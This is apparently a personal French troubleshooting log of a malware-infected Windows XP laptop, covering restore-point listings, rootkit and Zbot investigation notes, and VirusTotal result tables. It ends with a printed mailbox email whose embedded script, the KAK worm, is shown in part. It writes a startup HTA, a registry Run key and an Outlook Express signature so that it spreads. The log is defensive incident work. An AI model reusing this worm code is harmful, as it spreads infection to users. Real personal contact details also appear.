-rwxrwxrwx 1 root root     284 Aug 19 04:23 A0000059.ini
-rwxrwxrwx 1 root root      62 Aug 19 08:19 A0000060.ini
-rwxrwxrwx 1 root root      62 Aug 19 08:19 A0000061.ini
-rwxrwxrwx 1 root root    4334 Aug 19 08:19 A0000062.ini
-rwxrwxrwx 1 root root   16128 Aug 12  2005 A0000063.SYS
-rwxrwxrwx 1 root root      62 Aug 19 08:19 A0000064.ini
-rwxrwxrwx 1 root root     120 Aug 19 08:20 A0000065.ini
-rwxrwxrwx 1 root root     179 Aug 19 08:20 A0000066.lnk
-rwxrwxrwx 1 root root      94 Aug 19 08:20 A0000067.ini
-rwxrwxrwx 1 root root     485 Aug 19 08:20 A0000068.cfg
-rwxrwxrwx 1 root root    2621 Aug 19 08:20 A0000069.ini
-rwxrwxrwx 1 root root       0 Aug 19 08:21 A0000070.cfg
-rwxrwxrwx 1 root root     284 Aug 19 10:02 A0000071.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:03 A0000072.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:04 A0000073.ini
-rwxrwxrwx 1 root root    1459 Aug 19  2004 A0000074.lnk
-rwxrwxrwx 1 root root  254976 Aug 18 20:52 A0000075.exe
-rwxrwxrwx 1 root root 1057280 Aug 18 20:52 A0000076.exe
-rwxrwxrwx 1 root root     284 Aug 19 10:07 A0000077.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:09 A0000078.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:03 A0000079.ini
-rwxrwxrwx 1 root root    4334 Aug 19 10:04 A0000080.ini
-rwxrwxrwx 1 root root   16128 Aug 12  2005 A0000081.SYS
-rwxrwxrwx 1 root root      62 Aug 19 10:09 A0000082.ini
-rwxrwxrwx 1 root root     120 Aug 19 10:04 A0000083.ini
-rwxrwxrwx 1 root root     179 Aug 19 10:04 A0000084.lnk
-rwxrwxrwx 1 root root      94 Aug 19 10:04 A0000085.ini
-rwxrwxrwx 1 root root     485 Aug 19 10:05 A0000086.cfg
-rwxrwxrwx 1 root root    2621 Aug 19 10:05 A0000087.ini
-rwxrwxrwx 1 root root       0 Aug 19 10:05 A0000088.cfg
-rwxrwxrwx 1 root root     284 Aug 19 10:26 A0000089.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:27 A0000090.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:27 A0000091.ini
-rwxrwxrwx 1 root root     284 Aug 19 10:30 A0000092.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:31 A0000093.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:27 A0000094.ini
-rwxrwxrwx 1 root root    4334 Aug 19 10:27 A0000095.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:32 A0000096.ini
-rwxrwxrwx 1 root root   16128 Aug 12  2005 A0000097.SYS
-rwxrwxrwx 1 root root     120 Aug 19 10:28 A0000098.ini
-rwxrwxrwx 1 root root     179 Aug 19 10:28 A0000099.lnk
-rwxrwxrwx 1 root root      94 Aug 19 10:28 A0000100.ini
-rwxrwxrwx 1 root root     485 Aug 19 10:29 A0000101.cfg
-rwxrwxrwx 1 root root       0 Aug 19 10:29 A0000102.cfg
-rwxrwxrwx 1 root root    2621 Aug 19 10:29 A0000103.ini
-rwxrwxrwx 1 root root    1250 Aug 18 21:07 A0000104.ini
-rwxrwxrwx 1 root root 2772016 Jun  8 04:00 A0000105.DLL
-rwxrwxrwx 1 root root    6899 May 17 04:00 A0000106.VXD
-rwxrwxrwx 1 root root  275824 May 17 04:00 A0000107.DLL
-rwxrwxrwx 1 root root  371248 Jun  8 04:00 A0000108.SYS
-rwxrwxrwx 1 root root    5592 Jun  8 04:00 A0000109.SPM
-rwxrwxrwx 1 root root  102448 Jun  8 04:00 A0000110.SYS
-rwxrwxrwx 1 root root   85424 Jul 16 04:00 A0000111.SYS
-rwxrwxrwx 1 root root   30794 May 17 04:00 A0000112.VXD
-rwxrwxrwx 1 root root  177520 Jul 16 04:00 A0000113.DLL
-rwxrwxrwx 1 root root 1362608 Jul 16 04:00 A0000114.SYS
-rwxrwxrwx 1 root root  933451 May 17 04:00 A0000115.VXD
-rwxrwxrwx 1 root root 1713520 Jul 16 04:00 A0000116.DLL
-rwxrwxrwx 1 root root    8719 Jul 16 04:00 A0000117.CAT
-rwxrwxrwx 1 root root    1073 Jul 16 04:00 A0000118.INF
-rwxrwxrwx 1 root root    7829 Jun  8 04:00 A0000119.CAT
-rwxrwxrwx 1 root root     581 Jun  8 04:00 A0000120.INF
-rwxrwxrwx 1 root root  106244 Aug  7 04:00 A0000121.INF
-rwxrwxrwx 1 root root 1831705 Aug 19 09:55 A0000122.mfl
-rwxrwxrwx 1 root root     284 Aug 19 10:35 A0000123.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:36 A0000124.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:36 A0000125.ini
-rwxrwxrwx 1 root root      62 Aug 19 10:36 A0000126.ini
-rwxrwxrwx 1 root root    4334 Aug 19 10:36 A0000127.ini
-rwxrwxrwx 1 root root   16128 Aug 19 10:52 A0000128.SYS
-rwxrwxrwx 1 root root     120 Aug 19 10:37 A0000129.ini
-rwxrwxrwx 1 root root     179 Aug 19 10:37 A0000130.lnk
-rwxrwxrwx 1 root root      94 Aug 19 10:37 A0000131.ini
-rwxrwxrwx 1 root root    1250 Aug 19 10:49 A0000132.ini
-rwxrwxrwx 1 root root     485 Aug 19 10:37 A0000133.cfg
-rwxrwxrwx 1 root root    2621 Aug 19 10:38 A0000134.ini
-rwxrwxrwx 1 root root       0 Aug 19 10:38 A0000135.cfg
-rwxrwxrwx 1 root root     100 Aug 18 20:52 A0000136.ini
-rwxrwxrwx 1 root root 1831705 Aug 19 11:07 A0000137.mfl
-rwxrwxrwx 1 root root     728 Aug 18 18:33 A0000138.cfg
-rwxrwxrwx 1 root root      33 Aug 18 18:35 A0000139.cfg
-rwxrwxrwx 1 root root     181 Aug 18 18:34 A0000140.cfg
-rwxrwxrwx 1 root root     181 Aug 18 18:35 A0000141.cfg
-rwxrwxrwx 1 root root   13277 Aug 17 13:41 A0000142.ini
-rwxrwxrwx 1 root root      65 Aug 18 21:10 A0000143.ini
-rwxrwxrwx 1 root root     284 Aug 19 11:21 A0000144.ini
-rwxrwxrwx 1 root root  556032 Aug 17 03:31 A0000145.exe
-rwxrwxrwx 1 root root      62 Aug 19 11:22 A0000146.ini
-rwxrwxrwx 1 root root      62 Aug 19 11:22 A0000147.ini
-rwxrwxrwx 1 root root    4334 Aug 19 11:22 A0000148.ini
-rwxrwxrwx 1 root root   16128 Aug 19 10:52 A0000149.SYS
-rwxrwxrwx 1 root root      62 Aug 19 11:22 A0000150.ini
-rwxrwxrwx 1 root root     120 Aug 19 11:23 A0000151.ini
-rwxrwxrwx 1 root root     179 Aug 19 11:23 A0000152.lnk
-rwxrwxrwx 1 root root      94 Aug 19 11:23 A0000153.ini
-rwxrwxrwx 1 root root    1250 Aug 19 11:23 A0000154.ini
-rwxrwxrwx 1 root root     485 Aug 19 11:23 A0000155.cfg
-rwxrwxrwx 1 root root       0 Aug 19 11:24 A0000156.cfg
-rwxrwxrwx 1 root root    2621 Aug 19 11:24 A0000157.ini
-rwxrwxrwx 1 root root     100 Aug 19 11:24 A0000158.ini
-rwxrwxrwx 1 root root 1858700 Aug 19 13:33 A0000159.mfl
-rwxrwxrwx 1 root root     728 Aug 19 12:37 A0000160.cfg
-rwxrwxrwx 1 root root      33 Aug 19 12:39 A0000161.cfg
-rwxrwxrwx 1 root root     181 Aug 19 12:38 A0000162.cfg
-rwxrwxrwx 1 root root     181 Aug 19 12:39 A0000163.cfg
-rwxrwxrwx 1 root root     284 Aug 19 13:55 A0000164.ini
-rwxrwxrwx 2 root root       8 Aug 18 21:09 RestorePointSize
-rwxrwxrwx 1 root root   24070 Aug 19 14:46 change.log
-rwxrwxrwx 2 root root    9566 Aug 18 21:15 change.log.1
-rwxrwxrwx 2 root root  148268 Aug 19 11:21 change.log.10
-rwxrwxrwx 2 root root   61656 Aug 19 13:55 change.log.11
-rwxrwxrwx 2 root root   87178 Aug 18 21:27 change.log.2
-rwxrwxrwx 2 root root   18812 Aug 19 04:13 change.log.3
-rwxrwxrwx 2 root root   18340 Aug 19 04:23 change.log.4
-rwxrwxrwx 2 root root   19888 Aug 19 10:02 change.log.5
-rwxrwxrwx 2 root root   18340 Aug 19 10:07 change.log.6
-rwxrwxrwx 2 root root    4828 Aug 19 10:26 change.log.7
-rwxrwxrwx 2 root root   18340 Aug 19 10:30 change.log.8
-rwxrwxrwx 2 root root    2988 Aug 19 10:35 change.log.9
-rwxrwxrwx 1 root root     536 Aug 18 21:09 rp.log
drwxrwxrwx 1 root root    8192 Aug 18 21:09 snapshot
knoppix@Knoppix:/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1$ cd "/media/sdb2/System Vo

et les registres

total 22733
drwxrwxrwx 1 root root     8192 Aug 18 21:09 .
drwxrwxrwx 1 root root    45056 Aug 19 14:23 ..
-rwxrwxrwx 1 root root    25264 Nov 27  2007 ComDb.Dat
drwxrwxrwx 1 root root        0 Aug 18 21:09 Repository
-rwxrwxrwx 2 root root    28672 Aug 18 21:09 _REGISTRY_MACHINE_SAM
-rwxrwxrwx 2 root root    65536 Aug 18 21:09 _REGISTRY_MACHINE_SECURITY
-rwxrwxrwx 2 root root 34906112 Aug 18 21:09 _REGISTRY_MACHINE_SOFTWARE
-rwxrwxrwx 2 root root  6864896 Aug 18 21:09 _REGISTRY_MACHINE_SYSTEM
-rwxrwxrwx 2 root root   319488 Aug 18 21:09 _REGISTRY_USER_.DEFAULT
-rwxrwxrwx 2 root root   262144 Nov 21  2007 _REGISTRY_USER_NTUSER_S-1-5-18
-rwxrwxrwx 2 root root   237568 Aug 18 21:09 _REGISTRY_USER_NTUSER_S-1-5-19
-rwxrwxrwx 2 root root   237568 Aug 18 21:09 _REGISTRY_USER_NTUSER_S-1-5-20
-rwxrwxrwx 2 root root  6242304 Aug 18 21:09 _REGISTRY_USER_NTUSER_S-1-5-21-873811330-2162992586-328319703-1005
-rwxrwxrwx 2 root root   786432 Aug  3 14:09 _REGISTRY_USER_NTUSER_S-1-5-21-873811330-2162992586-328319703-500
-rwxrwxrwx 2 root root   262144 Nov 21  2007 _REGISTRY_USER_USRCLASS_S-1-5-18
-rwxrwxrwx 2 root root     8192 Aug 18 21:09 _REGISTRY_USER_USRCLASS_S-1-5-19
-rwxrwxrwx 2 root root     8192 Aug 18 21:09 _REGISTRY_USER_USRCLASS_S-1-5-20
-rwxrwxrwx 2 root root   331776 Aug 18 21:09 _REGISTRY_USER_USRCLASS_S-1-5-21-873811330-2162992586-328319703-1005
-rwxrwxrwx 2 root root   262144 Nov 21  2007 _REGISTRY_USER_USRCLASS_S-1-5-21-873811330-2162992586-328319703-500
-rwxrwxrwx 1 root root       34 Aug 18 21:09 domain.txt
knoppix@Knoppix:/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/snapshot$ cat domain.txt
CMHKIEFFLELAC0knoppix@Knoppix:/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/snapshot$

20100821
installé NIS 2010,
exécution NortonIU dit "paramètre invalide"
mise à jour par internet
NIS met en quarantaine le fichier "explorer.exe" (suspicious.mystic) essai de bypass selon sa procédure: http://www.symantec.com/security_response/writeup.jsp?docid=2010-062900-4618-99
émission email toujours là

possible lancer explorer manuellement depuis fenêtre cmd ou gestionnaire de tâches: c:\windows\servicespackfiles\i386\explorer.exe

impossible effacer le .exe téléchargé pour nortonIU
restaure explorer.exe de la quarantaine, plus ou moins echec ?
copie de SPF\i386, semble rester là
reboot, explorer est là!
mais toujours detection de \windows\temp.tmp et disarition
suppression partage de fichiers simple
essai créer une autre session
vérifier pwd administrateur
lu: http://community.norton.com/t5/Norton-Internet-Security-Norton/Bit-torrent-killed-XP-Pro-explorer-exe/m-p/271470

NIS en mode sans échec, retrouve explorer forcé ci dessus;
1064000 fichiers/répertoires (20100826: ce qui fait beaucoup! en tout cas beaucoup plus que clamav n'en trouvera; on n'en a jamais vu autant non plus lors des analyses (super rapides de jeudi soir!) , plus bas, Clamav 150000!); on les retrouvera le 20100826 par une analyse globale en mode normal: 1130311!)

semble utilisable en mode sans échec avec support réseau SAUF QUE:

explorer.exe (restauré et exclu de l'analyse au paragraphe précédent) est modifié et différent de celui dans SPF\i386 (vu par fc, dimension et commentaires identiques)
soumission à virustotal, connu de symantec: "trojan.bamital!inf", mais pas connu de clamav
lancé analyse complète en mode sans échec ... (un adobe reader bondissant?, fermé!)
voir photos

suivant discussion sur forum communauté norton, suspicion TDLSS :
http://community.norton.com/t5/Norton-Internet-Security-Norton/Bit-torrent-killed-XP-Pro-explorer-exe/m-p/271470

à propos de TDL3/4 (sans garantie qu'il soit présent!)

lire: http://rootbiez.blogspot.com/2009/11/rootkit-tdl3-why-so-serious-lets-put.html

outil kasperky: http://www.bleepingcomputer.com/virus-removal/remove-tdss-tdl3-alureon-rootkit-using-tdsskiller
autre (norman): http://www.norman.com/support/support_tools/77201/en
détecte un c:\windpws\system32\drivers\aj.....sys (voir photos)
impossible de l'effacer en windows (ni sans échec ni boot fenêtre de commande, pas cd pour console de réparation)
suppression en linux

clamscan signale \drivers\modem\r147115\kb999111.exe trojan.downloader-95613
soumis @ VirusTotal, clamav est le seul à le dectecter, sans doute faux poisitif

20100821-1513: (re) prise d'une image par dd, écriture sur Seagate Sata 160 Go s/n: 5LSC4ZHF, étiquette E 500 Orig. modèle: ST31160812AS
(montage pccard sata vers rack Js, débit: 30 Mo/s ). OK.

épilogue (peut-être)

pas trouvé le "dropper" (celui qui dépose la crapule)
pas trouvé le processus de persistence au reboot

20:00 patatras, écran bleu blue screen of death, BSOD

après un Live Update
a signalé "mes" interventions contre "suspicious.mystic" (avec mention de l'heure) peut-être nouvelle analyse des fichiers en quarantaine

20100822 feuille de route:

relire pages rootkit signalées ci dessus
acheter un tas de disques sata 160 Go. (possible peut-être utiliser temporairement les 320 espoirs de JS94)
passer clamav (de knoppix dvd 6.2.1) sur la copie de samedi aprem (en lecture seule)
chercher outil visualisation disque partie haute
lire en knoppix le disque du portable imboutable, chercher explorer, appdrv;sys aj*.sys, ..\local settings\temp
envisager que mon exception sur explorer.exe soit toujours en service
vérifier point de restauration, voir si RP1 est toujours là, RP2 de l'install NIS ...
refaire copie de portable dans l'état "boot impossible" de samedi soir 20 h.
restaurer sur le portable la copie de samedi aprem
faire LU, voir si reboot possible
dito, désinstaller NIS
dito ne pas utiliser firefox,instyaller opera
dito ôter droit d'admin au compte historique: A...
dito, monter un sas avec hub et surveiller trafic

echec montage ntfs du disque 160 dd de samedi soir
disque dans rack eSata, boot windows une fois impertinent!

knoppix 6.2.1, clamav 0.95.3, freshclam, compatible

oot@Microknoppix:~# ntfs-3g /dev/sdb2 /media/sdb2
Failed to read last sector (312383924): Argument invalide
HINTS: Either the volume is a RAID/LDM but it wasn't setup yet,

or it was not setup correctly (e.g. by not using mdadm --build ...),
or a wrong device is tried to be mounted,
or the partition table is corrupt (partition is smaller than NTFS),
or the NTFS boot sector is corrupt (NTFS size is not valid).
Failed to mount '/dev/sdb2': Argument invalide
The device '/dev/sdb2' doesn't seem to have a valid NTFS.
Maybe the wrong device is used? Or the whole disk instead of a
partition (e.g. /dev/sda, not /dev/sda1)? Or the other way around?
root@Microknoppix:~#

dd vers null pour voir taille lisible, bs=512! (77 Mo/s)

fdisk montre:

Disk /dev/sdb: 160.0 GB, 160000000000 bytes
255 heads, 63 sectors/track, 19452 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0xeede9d79

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1          12       96358+  de  Dell Utility
/dev/sdb2   *          13       19457   156191962+   7  HPFS/NTFS

mais les secteur sont lisibles:
312500000+0 enregistrements lus
312500000+0 enregistrements écrits
160000000000 octets (160 GB) copiés, 2582,29 s, 62,0 MB/s
root@Microknoppix:~#

coller ici les fdisk du 1 To créé jeudi 19 soir et de sa copie
fdisk 160 Go de jeudi soir

Disk /dev/sdb: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0xeede9d79

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1               1          12       96358+  de  Dell Utility
/dev/sdb2   *          13       19457   156191962+   7  HPFS/NTFS

Command (m for help):

donc PLUS GRAND,
mais la zone utilisée est inférieur à la dim, donc on peut espérer restorable!

dimension du disque interne: comme le 160 Go du jeudi soir

pourrait être le signe de la copie persistente de la crapule

faire test aussi sur le portable en état imbootable

clamscan sur disque "jeudio soir"

media/sdb2/Documents and Settings/Annick Kieffer/Mes documents/attach08/Laposte.zip: Trojan.Zbot-2154 FOUND (virustotal signale 4 détection,

File name:
Not available, prior to VT database update
Submission date:
2008-09-18 10:55:58 (UTC)
Current status:
finished
Result:
4 /36 (11.1%)
	
VT Community

not reviewed
 Safety score: - 
Compact
Print results
Antivirus 	Version 	Last Update 	Result
AhnLab-V3 	- 	- 	-
AntiVir 	- 	- 	-
Authentium 	- 	- 	W32/Malware!OC-based
Avast 	- 	- 	-
AVG 	- 	- 	-
BitDefender 	- 	- 	-
CAT-QuickHeal 	- 	- 	(Suspicious) - DNAScan
ClamAV 	- 	- 	-
DrWeb 	- 	- 	-
eSafe 	- 	- 	-
eTrust-Vet 	- 	- 	-
Ewido 	- 	- 	-
F-Prot 	- 	- 	W32/Malware!OC-based
F-Secure 	- 	- 	-
Fortinet 	- 	- 	-
GData 	- 	- 	-
Ikarus 	- 	- 	-
K7AntiVirus 	- 	- 	-
Kaspersky 	- 	- 	-
McAfee 	- 	- 	-
Microsoft 	- 	- 	PWS:Win32/Zbot.gen!B
NOD32v2 	- 	- 	-
Norman 	- 	- 	-
Panda 	- 	- 	-
PandaBeta 	- 	- 	-
PCTools 	- 	- 	-
Prevx1 	- 	- 	-
Rising 	- 	- 	-
Sophos 	- 	- 	-
Sunbelt 	- 	- 	-
Symantec 	- 	- 	-
TheHacker 	- 	- 	-
TrendMicro 	- 	- 	-
VBA32 	- 	- 	-
ViRobot 	- 	- 	-
VirusBuster 	- 	- 	-
Webwasher-Gateway 	- 	- 	-
Additional information
Show all

re-analyse, du 100%

File name:
Laposte.zip
Submission date:
2010-08-22 03:23:36 (UTC)
Current status:
queued (#6) queued (#6) analysing finished
Result:
40/ 42 (95.2%)
	
VT Community

not reviewed
 Safety score: - 
Compact
Print results
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2010.08.22.00	2010.08.21	Win-Trojan/Fraudpack.Gen
AntiVir	8.2.4.38	2010.08.20	TR/Spy.ZBot.DCA
Antiy-AVL	2.0.3.7	2010.08.16	Trojan/Win32.Zbot.gen
Authentium	5.2.0.5	2010.08.22	W32/Malware!OC-based
Avast	4.8.1351.0	2010.08.22	Win32:Ups
Avast5	5.0.332.0	2010.08.22	Win32:Ups
AVG	9.0.0.851	2010.08.21	Pakes_c.SO
BitDefender	7.2	2010.08.22	Trojan.FakeAntivirus.Gen
CAT-QuickHeal	11.00	2010.08.21	TrojanSpy.Zbot.eto
ClamAV	0.96.2.0-git	2010.08.22	Trojan.Zbot-2154
Comodo	5811	2010.08.22	UnclassifiedMalware
DrWeb	5.0.2.03300	2010.08.22	Trojan.PWS.Panda.4
Emsisoft	5.0.0.37	2010.08.21	Trojan-Spy.Win32.Zbot!IK
eSafe	7.0.17.0	2010.08.19	Win32.Zbot.eto
eTrust-Vet	36.1.7804	2010.08.21	Win32/Kollah.PI
F-Prot	4.6.1.107	2010.08.22	W32/Malware!OC-based
F-Secure	9.0.15370.0	2010.08.21	Trojan-Spy:W32/Zbot.TM
Fortinet	4.1.143.0	2010.08.21	W32/Agent.SOL!tr
GData	21	2010.08.22	Trojan.FakeAntivirus.Gen
Ikarus	T3.1.1.88.0	2010.08.21	Trojan-Spy.Win32.Zbot
Jiangmin	13.0.900	2010.08.21	TrojanSpy.Zbot.cmm
Kaspersky	7.0.0.125	2010.08.22	Trojan-Spy.Win32.Zbot.eto
McAfee	5.400.0.1158	2010.08.22	Spy-Agent.bw
McAfee-GW-Edition	2010.1B	2010.08.21	Spy-Agent.bw
Microsoft	1.6103	2010.08.21	PWS:Win32/Zbot.gen!B
NOD32	5385	2010.08.21	Win32/Spy.Agent.NIY
Norman	6.05.11	2010.08.21	W32/Obfuscated.D!genr
nProtect	2010-08-21.01	2010.08.21	Trojan.FakeAntivirus.Gen
Panda	10.0.2.7	2010.08.21	Adware/RogueAntimalware2008
PCTools	7.0.3.5	2010.08.22	HeurEngine.MaliciousPacker
Prevx	3.0	2010.08.22	High Risk Cloaked Malware
Rising	22.61.04.04	2010.08.20	-
Sophos	4.56.0	2010.08.22	Troj/Agent-HQD
Sunbelt	6773	2010.08.22	Trojan-Spy.Win32.Zbot.gen (fs)
SUPERAntiSpyware	4.40.0.1006	2010.08.21	-
Symantec	20101.1.1.7	2010.08.22	Packed.Generic.187
TheHacker	6.5.2.1.352	2010.08.20	Trojan/Spy.Zbot.eto
TrendMicro	9.120.0.1004	2010.08.21	TSPY_ZBOT.YY
TrendMicro-HouseCall	9.120.0.1004	2010.08.22	TSPY_ZBOT.YY
VBA32	3.12.14.0	2010.08.20	Malware-Cryptor.Win32.General.4
ViRobot	2010.8.18.3995	2010.08.21	Spyware.Zbot.65024.A
VirusBuster	5.0.27.0	2010.08.21	TrojanSpy.Zbot.CHQ

pourquoi pas détecté par NIS ?
théoriquement, il faut envisager qu'il soit actif et déguisé! GRAVE: risque de capture/vol de passwords ou codes bancaires.
lire peut-être: http://en.wikipedia.org/wiki/Zeus_%28trojan_horse%29
date de 20080911
contient un Laposte.exe du 20080910, mêmes détections!
commentaires (pour les profs!): http://www.eila.univ-paris-diderot.fr/sysadmin/blog/mail_intitule_%C2%A0la_poste_colis_postal

js.kak dans in.mbxold
par grep Kagou, à quelques (4 ou 5) % près

knoppix@Microknoppix:~$ cat in.mbxold 
From ???@??? Tue Sep 12 13:00:47 2000
Received: from venus.whosnet.com (venus.whosnet.com [151.196.89.206])
	by iresco.iresco.fr (8.9.1b+Sun/8.9.1) with ESMTP id PAA27550
	for <kieffer@iresco.fr>; Fri, 8 Sep 2000 15:32:51 +0200 (MET DST)
Received: from beaujon-18-139.abo.wanadoo.fr (ftipfxKTHE) [164.138.28.139] 
	by venus.whosnet.com with smtp (WhosNet Mail System)
	id 13XOVQ-0006iM-00; Fri, 08 Sep 2000 09:47:49 -0400
Message-ID: <002701c01999$241f5de0$eb6f8aa4@ftipfxKTHE>
From: Cécile REGNIER <regnier@asts.asso.fr>
To: <kieffer@iresco.fr>
Subject: Tr: colloque interministériel - invitation
Date: Fri, 8 Sep 2000 15:30:56 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0021_01C019A9.C86C92E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
X-UIDL: 81ebc17b64e07155ffc84afab41e0f20
Status: U

<x-html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC 
id=scr></OBJECT></DIV><FONT face=Arial size=2>
<DIV><FONT face=Arial size=2>
<DIV><FONT face=Arial size=2>Chère Madame,</FONT></DIV>
<DIV><FONT face=Arial size=2><BR>L'Association Science Technologie Société 
(ASTS) est chargée par le<BR>Ministère de la Recherche d'organiser le colloque 
interministériel<BR>"Science et technologies : pourquoi les filles ?", qui se 
tiendra le 26<BR>octobre 2000 au CNAM à Paris.</FONT></DIV>
<DIV><FONT face=Arial size=2><BR>Vous en trouverez ci-joint un document de 
présentation générale<BR>ainsi que&nbsp;le programme prévisionnel à ce 
jour.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=Arial size=2>Ce colloque est destiné à mobiliser les partenaires 
de la culture<BR>scientifique et plus largement les partenaires du système 
éducatif ainsi<BR>que le réseau du service des Droits des Femmes, sur les 
actions à<BR>mener tout au long de l'année dans les établissements scolaires 
et<BR>universitaires, pour inciter les jeunes et plus particulièrement 
les<BR>filles, à s'orienter vers les filières d'études et les 
carrières<BR>scientifiques.</FONT></DIV>
<DIV><FONT face=Arial size=2><BR>C'est pourquoi je me permets de vous contacter 
aujourd'hui.<BR>Le comité de pilotage serait très heureux que vous acceptiez 
de<BR>prendre en charge l'atelier N°4 (introduction et animation) sur le thème 
</FONT></DIV>
<DIV><FONT face=Arial size=2>"l'insertion professionnelle des jeunes femmes dans 
les métiers scientifiques et technologiques", aux côtés de </FONT><FONT 
face=Arial size=2>Anne-Marie REVCO du ministère de la recherche, qui parlera de 
la création d'entreprises par les femmes et se chargera du rapport des travaux 
de l'atelier en plénière.</FONT><FONT face=Arial size=2> (Le rapport se fera 
sous la forme d'une suite de questions-réponses aux rapporteurs des ateliers, 
animée par Michèle Chouchan</FONT><FONT face=Arial size=2>).</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>
<DIV><FONT face=Arial size=2>Je reste à votre entière disposition pour en 
discuter avec vous, au<BR>01 44 89 82 82 ou par e-mail.</FONT></DIV>
<DIV><FONT face=Arial size=2><BR>En espérant que vous accepterez notre 
invitation, je vous prie<BR>d'agréer, Chère Madame, l'expression de toute ma 
considération.</FONT></DIV>
<DIV><FONT face=Arial size=2><BR>Cécile Régnier<BR>coordinatrice générale de 
l'ASTS<BR>19, place de l'Argonne - 75019 Paris<BR>tél : 01 44 89 82 82 - Fax : 
01 40 35 27 73<BR>&nbsp;<A 
href="http://www.asts.asso.fr">http://www.asts.asso.fr</A><BR><BR></DIV></FONT></FONT></DIV></FONT>
<SCRIPT><!--
function sErr(){return true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>function sEr(){self.close();return true;}window.onerror=sEr;fs=new ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUDÉ~1\\\\PROGRA~1\\\\DÉMARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAsTextStream(8);pth=(kk==kfr)?wd+'MENUD~1\\\\PROGRA~1\\\\DMARR~1\\\\kak.hta':ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2).Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]');t2.WriteLine('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s '+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return 